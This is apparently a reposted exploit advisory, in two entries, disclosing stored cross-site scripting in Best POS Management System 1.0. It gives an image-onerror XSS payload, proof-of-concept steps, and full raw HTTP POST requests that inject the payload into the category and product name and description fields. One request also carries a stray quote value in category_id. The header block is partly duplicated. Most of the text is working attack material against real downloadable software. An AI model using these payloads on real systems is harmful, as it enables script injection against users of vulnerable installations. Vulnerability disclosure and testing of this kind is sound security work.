Best POS Management System 1.0 Cross Site Scripting

Details: Written by: khalil; Category: Vulnerabilities; Hits: 171

# Exploit Title: Stored Cross Site Scripting on Best pos Management System
# Google Dork: NA
# Date: 14/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
# Exploit Title: Stored Cross Site Scripting on Best pos Management System
# Google Dork: NA
# Date: 14/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA

# Description

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :
1- Head to Add Category on
"http://localhost/kruxton/index.php?page=add-category"

2- On Name Parameter add our Payload "><img src=x
onerror=prompt(document.domain);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_category HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------7128987773293048653857517
Content-Length: 442
Origin: http://localhost
Connection: close
Referer: http://localhost/kruxton/index.php?page=add-category
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="id"

-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="name"

XSSPOC"><img src=x onerror=prompt(document.domain);>
-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="description"

This is POC
-----------------------------7128987773293048653857517--
```

--------------------------------------

# Exploit Title: Stored Cross Site Scripting on Best pos Management System
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :
1- Head to Add Category on
"http://localhost/kruxton/ajax.php?action=save_product"

2- On Name Parameter add our Payload "><img src=x
onerror=prompt(document.domain);>

on description <img src=x onerror=prompt(2);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_product HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------11015616619250686693182759357
Content-Length: 830
Origin: http://localhost
Connection: close
Referer: http://localhost/kruxton/index.php?page=add-product
Cookie: PHPSESSID=<COOKIE>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="id"

-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="category_id"

3'
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="name"

XSSPOC2"><img src=x onerror=prompt(document.domain);>
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="description"

XSSPOC2"><img src=x onerror=prompt(2);>
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="price"

1122
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="status"

1
-----------------------------11015616619250686693182759357--

```